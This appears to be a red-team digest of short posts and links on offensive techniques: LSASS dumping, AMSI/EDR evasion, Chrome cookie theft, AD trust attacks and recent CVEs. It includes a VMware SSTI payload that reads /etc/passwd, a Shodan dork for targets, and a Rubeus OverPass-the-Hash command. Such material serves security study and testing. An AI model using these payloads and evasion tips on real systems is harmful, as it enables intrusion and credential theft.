LOLBIN to dump LSASS

Path:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

Binary:
DumpMinitool.exe

#lolbin #lsass #dump

The Bug Hunter Methodology

PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf

#bugbounty #methodology #xmind

Spring4Shell Scan

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.

https://github.com/fullhunt/spring4shell-scan

#spring4shell #spring #scan #tools

Unmanaged Code Execution with .NET Dynamic PInvoke

https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/

#edr #evasion #pinvoke #csharp #blog

Rockyou for Web Fuzzing

This is a wordlist for fuzzing purposes made from the best wordlists currently available, lowercased and deduplicated later with duplicut, added cleaner from BonJarber.

The lists used have been some selected within these repositories:

— fuzzdb
— SecLists
— xmendez
— minimaxir
— TheRook
— danielmiessler
— swisskyrepo
— 1N3
— cujanovic
— lavalamp
— ics-default
— jeanphorn
— j3ers3
— nyxxxie
— dirbuster
— dotdotpwn
— hackerone_wordlist
— commonspeak2
— bruteforce-list
— assetnote

https://github.com/six2dez/OneListForAll

#web #fuzzing #wordlist

Remotely Dumping Chrome Cookies

The method in this blog post does not require the remote debugger or Keychain (macOS)/DPAPI (Windows) access and applies to Chromium-based browsers in general

https://cedowens.medium.com/remotely-dumping-chrome-cookies-revisited-b25343257209

#chrome #cookie #dump #blog

How NAT traversal works

This blog post about NAT and NAT traversal is truly awesome!

https://tailscale.com/blog/how-nat-traversal-works/

#howto #nat #blog

AppRecoveryCallback Inject

Overwrite a process's recovery callback and invoke a crash to execute

https://github.com/Wra7h/ARCInject

#av #edr #evasion #inject #csharp

VMware Workspace ONE — SSTI (CVE-2022-22954)

Successful exploitation could lead to RCE from an unauthenticated user.

Payload:
https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

Exploit:
https://github.com/bewhale/CVE-2022-22954

Shodan Dork:
http.favicon.hash:-1250474341

#vmware #workspace #ssti #cve

Coercing NTLM Authentication from SCCM

https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a

#ad #ntlm #sccm

Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime (CVE-2022-26809)

https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime

#windows #rpc #rce #research

Red Team Tips

To get rid of Microsoft Defender "behaviour based" amsi detection in case of opening a https C2 channel, it can help, to play with the parameter UserAgent. For example, try a Windows Update User Agent.

#redteam #tips #defender #bypass

SID filter as security boundary between domains?

Microsoft states that "the forest (not the domain) is the security boundary in an Active Directory implementation", meaning that Domain Admins of a child domain is essentially as privileged as Enterprise Admins in a root domain and will have administrative rights in all domains of the forest. Why? We guessed that the default trust between domains inside a forest enables any child domain to trick the root domain to treat child domain users as Enterprise Admins by abusing the SID history (ExtraSids) functionality – this attack/technique is known as "Access Token Manipulation: SID-History Injection" and is explained in a later part of this series.

Kerberos authentication explained (Part 1)
Known AD attacks - from child to parent (Part 2)
SID filtering explained (Part 3)
Bypass SID filtering research (Part 4)
Golden GMSA trust attack - from child to parent (Part 5)
Schema change trust attack - from child to parent (Part 6)
Trust account attack - from trusting to trusted (Part 7)

#ad #trust #kerberus #research

Microsoft Sharepoint RCE (CVE-2022-22005)

https://hnd3884.github.io/posts/cve-2022-22005-microsoft-sharepoint-RCE/

#sharepoint #rce #cve #research

Red Teaming Toolkit

A collection of open source and commercial tools that aid in red team operations. This post will help you during red team engagement.

Contents
— Reconnaissance
— Weaponization
— Delivery
— Command and Control
— Lateral Movement
— Establish Foothold
— Escalate Privileges
— Data Exfiltration
— Misc
— References

https://renatoborbolla.medium.com/red-teaming-adversary-simulation-toolkit-da89b20cb5ea

#redteam #toolkit #powershell #c2

OverPass-the-Hash in 1C Enterprise

To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.

Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"

Bonus:
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell

#1c #pth #rubeus #ad

ShadowMove Pivot Technique

ShadowMove is a novel technique to hijack sockets from non-cooperative processes. It is described in the paper ShadowMove: A Stealthy Lateral Movement Strategy presented at USENIX ‘20. This technique takes advantage of the fact that AFD (Ancillary Function Driver) file handles are treated as socket handles by Windows APIs, so it is possible to duplicate them with WSADuplicateSocket().

https://adepts.of0x.cc/shadowmove-hijack-socket/

#shadowmove #hijacking #socket #redteam

CVE-2022-29072

7-Zip 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area (0-day)

https://github.com/kagancapar/CVE-2022-29072

In-Process Patchless AMSI Bypass

https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/

#amsi #bypass #av #evasion

A blueprint for evading industry leading endpoint protection in 2022

In this post, I’d like to lay out a collection of techniques that together can be used to bypassed industry leading enterprise endpoint protection solutions. This is purely for educational purposes for (ethical) red teamers and alike, so I’ve decided not to publicly release the source code. The aim for this post is to be accessible to a wide audience in the security industry, but not to drill down to the nitty gritty details of every technique. Instead, I will refer to writeups of others that deep dive better than I can:

https://vanmieghem.io/blueprint-for-evading-edr-in-2022/

#av #edr #evasion #research